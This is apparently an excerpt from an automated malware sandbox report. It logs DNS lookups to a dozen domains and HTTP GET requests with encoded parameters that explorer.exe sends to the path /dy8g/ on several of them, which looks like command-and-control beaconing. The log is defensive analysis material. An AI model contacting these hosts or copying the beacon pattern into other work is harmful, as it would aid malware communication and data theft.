Jul 22, 2021 10:08:30.346405983 CEST	64185	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:30.398354053 CEST	53	64185	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:31.613595963 CEST	65110	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:31.662669897 CEST	53	65110	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:36.394907951 CEST	58361	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:36.456167936 CEST	53	58361	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:39.245728970 CEST	63492	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:39.302848101 CEST	53	63492	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:40.089693069 CEST	60831	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:40.141911030 CEST	53	60831	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:41.045433044 CEST	60100	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:41.095683098 CEST	53	60100	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:42.972035885 CEST	53195	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:43.003645897 CEST	50141	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:43.043905020 CEST	53	53195	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:43.053142071 CEST	53	50141	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:43.882522106 CEST	53023	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:43.934840918 CEST	53	53023	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:44.763690948 CEST	49563	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:44.815905094 CEST	53	49563	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:45.577502966 CEST	51352	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:45.629818916 CEST	53	51352	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:46.608787060 CEST	59349	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:46.662081957 CEST	53	59349	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:47.567668915 CEST	57084	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:47.619707108 CEST	53	57084	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:48.303457022 CEST	58823	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:48.363425016 CEST	53	58823	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:48.554132938 CEST	57568	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:48.606364965 CEST	53	57568	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:49.458520889 CEST	50540	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:49.509917021 CEST	53	50540	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:50.246840954 CEST	54366	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:50.307749033 CEST	53	54366	8.8.8.8	192.168.2.3
Jul 22, 2021 10:08:51.109283924 CEST	53034	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:08:51.166553020 CEST	53	53034	8.8.8.8	192.168.2.3
Jul 22, 2021 10:09:04.199525118 CEST	57762	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:09:04.256830931 CEST	53	57762	8.8.8.8	192.168.2.3
Jul 22, 2021 10:09:05.608653069 CEST	55435	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:09:05.661124945 CEST	53	55435	8.8.8.8	192.168.2.3
Jul 22, 2021 10:09:09.900319099 CEST	50713	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:09:09.962426901 CEST	53	50713	8.8.8.8	192.168.2.3
Jul 22, 2021 10:09:27.593406916 CEST	56132	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:09:27.662265062 CEST	53	56132	8.8.8.8	192.168.2.3
Jul 22, 2021 10:09:30.499138117 CEST	58987	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:09:30.569478035 CEST	53	58987	8.8.8.8	192.168.2.3
Jul 22, 2021 10:09:35.859954119 CEST	56579	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:09:36.011416912 CEST	53	56579	8.8.8.8	192.168.2.3
Jul 22, 2021 10:09:41.030852079 CEST	60633	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:09:41.094779968 CEST	53	60633	8.8.8.8	192.168.2.3
Jul 22, 2021 10:09:46.517425060 CEST	61292	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:09:46.580676079 CEST	53	61292	8.8.8.8	192.168.2.3
Jul 22, 2021 10:09:51.038237095 CEST	63619	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:09:51.095227957 CEST	53	63619	8.8.8.8	192.168.2.3
Jul 22, 2021 10:09:51.921794891 CEST	64938	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:09:51.985435009 CEST	53	64938	8.8.8.8	192.168.2.3
Jul 22, 2021 10:09:54.164046049 CEST	61946	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:09:54.229479074 CEST	53	61946	8.8.8.8	192.168.2.3
Jul 22, 2021 10:09:57.199111938 CEST	64910	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:09:57.373522997 CEST	53	64910	8.8.8.8	192.168.2.3
Jul 22, 2021 10:10:02.774408102 CEST	52123	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:10:02.839271069 CEST	53	52123	8.8.8.8	192.168.2.3
Jul 22, 2021 10:10:13.128496885 CEST	56130	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:10:13.306884050 CEST	53	56130	8.8.8.8	192.168.2.3
Jul 22, 2021 10:10:18.741259098 CEST	56338	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:10:18.806142092 CEST	53	56338	8.8.8.8	192.168.2.3
Jul 22, 2021 10:10:23.817125082 CEST	59420	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:10:24.250442982 CEST	53	59420	8.8.8.8	192.168.2.3
Jul 22, 2021 10:10:29.266855955 CEST	58784	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:10:29.331233025 CEST	53	58784	8.8.8.8	192.168.2.3
Jul 22, 2021 10:10:34.345170021 CEST	63978	53	192.168.2.3	8.8.8.8
Jul 22, 2021 10:10:34.419543982 CEST	53	63978	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 22, 2021 10:09:30.499138117 CEST	192.168.2.3	8.8.8.8	0xc232	Standard query (0)	www.chaneabond.com	A (IP address)	IN (0x0001)
Jul 22, 2021 10:09:35.859954119 CEST	192.168.2.3	8.8.8.8	0xd65a	Standard query (0)	www.oikoschain.com	A (IP address)	IN (0x0001)
Jul 22, 2021 10:09:41.030852079 CEST	192.168.2.3	8.8.8.8	0x6aff	Standard query (0)	www.melodezu.com	A (IP address)	IN (0x0001)
Jul 22, 2021 10:09:46.517425060 CEST	192.168.2.3	8.8.8.8	0xd443	Standard query (0)	www.cajunseafoodstcloud.com	A (IP address)	IN (0x0001)
Jul 22, 2021 10:09:51.921794891 CEST	192.168.2.3	8.8.8.8	0xc357	Standard query (0)	www.extinctionbrews.com	A (IP address)	IN (0x0001)
Jul 22, 2021 10:09:57.199111938 CEST	192.168.2.3	8.8.8.8	0x4d29	Standard query (0)	www.tinsley.website	A (IP address)	IN (0x0001)
Jul 22, 2021 10:10:02.774408102 CEST	192.168.2.3	8.8.8.8	0x6d1a	Standard query (0)	www.surivaganza.com	A (IP address)	IN (0x0001)
Jul 22, 2021 10:10:13.128496885 CEST	192.168.2.3	8.8.8.8	0xcf9f	Standard query (0)	www.matcitekids.com	A (IP address)	IN (0x0001)
Jul 22, 2021 10:10:18.741259098 CEST	192.168.2.3	8.8.8.8	0xc04c	Standard query (0)	www.mydreamtv.net	A (IP address)	IN (0x0001)
Jul 22, 2021 10:10:23.817125082 CEST	192.168.2.3	8.8.8.8	0x1117	Standard query (0)	www.monsoonnerd.com	A (IP address)	IN (0x0001)
Jul 22, 2021 10:10:29.266855955 CEST	192.168.2.3	8.8.8.8	0xa2bb	Standard query (0)	www.avito-payment.life	A (IP address)	IN (0x0001)
Jul 22, 2021 10:10:34.345170021 CEST	192.168.2.3	8.8.8.8	0x8ea6	Standard query (0)	www.wthcoffee.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 22, 2021 10:09:30.569478035 CEST	8.8.8.8	192.168.2.3	0xc232	No error (0)	www.chaneabond.com	ext-sq.squarespace.com		CNAME (Canonical name)	IN (0x0001)
Jul 22, 2021 10:09:30.569478035 CEST	8.8.8.8	192.168.2.3	0xc232	No error (0)	ext-sq.squarespace.com		198.185.159.144	A (IP address)	IN (0x0001)
Jul 22, 2021 10:09:30.569478035 CEST	8.8.8.8	192.168.2.3	0xc232	No error (0)	ext-sq.squarespace.com		198.49.23.145	A (IP address)	IN (0x0001)
Jul 22, 2021 10:09:30.569478035 CEST	8.8.8.8	192.168.2.3	0xc232	No error (0)	ext-sq.squarespace.com		198.185.159.145	A (IP address)	IN (0x0001)
Jul 22, 2021 10:09:30.569478035 CEST	8.8.8.8	192.168.2.3	0xc232	No error (0)	ext-sq.squarespace.com		198.49.23.144	A (IP address)	IN (0x0001)
Jul 22, 2021 10:09:36.011416912 CEST	8.8.8.8	192.168.2.3	0xd65a	Name error (3)	www.oikoschain.com	none	none	A (IP address)	IN (0x0001)
Jul 22, 2021 10:09:41.094779968 CEST	8.8.8.8	192.168.2.3	0x6aff	No error (0)	www.melodezu.com	melodezu.com		CNAME (Canonical name)	IN (0x0001)
Jul 22, 2021 10:09:41.094779968 CEST	8.8.8.8	192.168.2.3	0x6aff	No error (0)	melodezu.com		64.227.87.162	A (IP address)	IN (0x0001)
Jul 22, 2021 10:09:46.580676079 CEST	8.8.8.8	192.168.2.3	0xd443	No error (0)	www.cajunseafoodstcloud.com	cajunseafoodstcloud.com		CNAME (Canonical name)	IN (0x0001)
Jul 22, 2021 10:09:46.580676079 CEST	8.8.8.8	192.168.2.3	0xd443	No error (0)	cajunseafoodstcloud.com		52.5.43.61	A (IP address)	IN (0x0001)
Jul 22, 2021 10:09:51.985435009 CEST	8.8.8.8	192.168.2.3	0xc357	No error (0)	www.extinctionbrews.com	extinctionbrews.com		CNAME (Canonical name)	IN (0x0001)
Jul 22, 2021 10:09:51.985435009 CEST	8.8.8.8	192.168.2.3	0xc357	No error (0)	extinctionbrews.com		34.102.136.180	A (IP address)	IN (0x0001)
Jul 22, 2021 10:09:57.373522997 CEST	8.8.8.8	192.168.2.3	0x4d29	No error (0)	www.tinsley.website	tinsley.website		CNAME (Canonical name)	IN (0x0001)
Jul 22, 2021 10:09:57.373522997 CEST	8.8.8.8	192.168.2.3	0x4d29	No error (0)	tinsley.website		50.87.238.189	A (IP address)	IN (0x0001)
Jul 22, 2021 10:10:02.839271069 CEST	8.8.8.8	192.168.2.3	0x6d1a	No error (0)	www.surivaganza.com		217.160.0.254	A (IP address)	IN (0x0001)
Jul 22, 2021 10:10:13.306884050 CEST	8.8.8.8	192.168.2.3	0xcf9f	No error (0)	www.matcitekids.com	matcitekids.com		CNAME (Canonical name)	IN (0x0001)
Jul 22, 2021 10:10:13.306884050 CEST	8.8.8.8	192.168.2.3	0xcf9f	No error (0)	matcitekids.com		50.87.248.20	A (IP address)	IN (0x0001)
Jul 22, 2021 10:10:18.806142092 CEST	8.8.8.8	192.168.2.3	0xc04c	Name error (3)	www.mydreamtv.net	none	none	A (IP address)	IN (0x0001)
Jul 22, 2021 10:10:24.250442982 CEST	8.8.8.8	192.168.2.3	0x1117	Server failure (2)	www.monsoonnerd.com	none	none	A (IP address)	IN (0x0001)
Jul 22, 2021 10:10:29.331233025 CEST	8.8.8.8	192.168.2.3	0xa2bb	Name error (3)	www.avito-payment.life	none	none	A (IP address)	IN (0x0001)
Jul 22, 2021 10:10:34.419543982 CEST	8.8.8.8	192.168.2.3	0x8ea6	No error (0)	www.wthcoffee.com	wthcoffee.com		CNAME (Canonical name)	IN (0x0001)
Jul 22, 2021 10:10:34.419543982 CEST	8.8.8.8	192.168.2.3	0x8ea6	No error (0)	wthcoffee.com		184.168.131.241	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.chaneabond.com

www.melodezu.com

www.cajunseafoodstcloud.com

www.extinctionbrews.com

www.tinsley.website

www.surivaganza.com

www.matcitekids.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49735	198.185.159.144	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 10:09:30.709867954 CEST	8966	OUT	GET /dy8g/?9rrLUp1=0Hs+m/QFKKZkFwACjLHyI7vfWqidr4y2jXRg5Hngc5JW+skIzqaHxis+6ShLP6A0B+d4&sxlxj=RL30W HTTP/1.1 Host: www.chaneabond.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 10:09:30.850486994 CEST	8968	IN	HTTP/1.1 400 Bad Request Cache-Control: no-cache, must-revalidate Content-Length: 77564 Content-Type: text/html; charset=UTF-8 Date: Thu, 22 Jul 2021 08:09:30 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: xRDopGny/s0ICaPnB Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
Jul 22, 2021 10:09:30.850527048 CEST	8969	IN	Data Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
Jul 22, 2021 10:09:30.850545883 CEST	8970	IN	Data Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34 Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
Jul 22, 2021 10:09:30.850559950 CEST	8971	IN	Data Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75 Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
Jul 22, 2021 10:09:30.850578070 CEST	8972	IN	Data Raw: 64 57 72 56 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a Data Ascii: dWrV84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS
Jul 22, 2021 10:09:30.850606918 CEST	8973	IN	Data Raw: 73 55 74 73 78 4c 45 35 68 38 53 70 70 4e 4d 66 78 35 69 6a 57 48 70 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a Data Ascii: sUtsxLE5h8SppNMfx5ijWHpb3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFI
Jul 22, 2021 10:09:30.850624084 CEST	8975	IN	Data Raw: 6a 66 69 63 35 33 53 6e 75 34 72 53 74 2b 48 74 59 6a 2b 4a 76 41 47 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77 Data Ascii: jfic53Snu4rSt+HtYj+JvAGJIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2u
Jul 22, 2021 10:09:30.850641012 CEST	8976	IN	Data Raw: 49 73 56 6e 48 51 76 47 66 48 4a 59 2b 47 73 46 4f 76 65 49 61 4c 6b 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79 Data Ascii: IsVnHQvGfHJY+GsFOveIaLkZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3
Jul 22, 2021 10:09:30.850658894 CEST	8977	IN	Data Raw: 62 61 4b 64 68 59 6b 30 71 76 4f 51 56 49 71 79 6b 70 38 72 73 6c 57 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53 Data Ascii: baKdhYk0qvOQVIqykp8rslWKKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOY
Jul 22, 2021 10:09:30.850675106 CEST	8979	IN	Data Raw: 50 33 55 43 44 61 59 67 2f 34 41 2f 4a 38 2b 65 6d 71 41 74 30 47 53 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73 Data Ascii: P3UCDaYg/4A/J8+emqAt0GSW9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBW
Jul 22, 2021 10:09:30.983715057 CEST	8980	IN	Data Raw: 39 79 46 49 39 70 49 64 59 71 59 66 31 4d 41 4e 36 52 49 2b 77 53 49 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37 Data Ascii: 9yFI9pIdYqYf1MAN6RI+wSI/qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMf

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49736	64.227.87.162	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 10:09:41.284584999 CEST	8985	OUT	GET /dy8g/?9rrLUp1=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpA7pfREgQYT&sxlxj=RL30W HTTP/1.1 Host: www.melodezu.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 10:09:41.472515106 CEST	8986	IN	HTTP/1.1 404 Not Found Date: Thu, 22 Jul 2021 08:09:41 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 278 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 6c 6f 64 65 7a 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 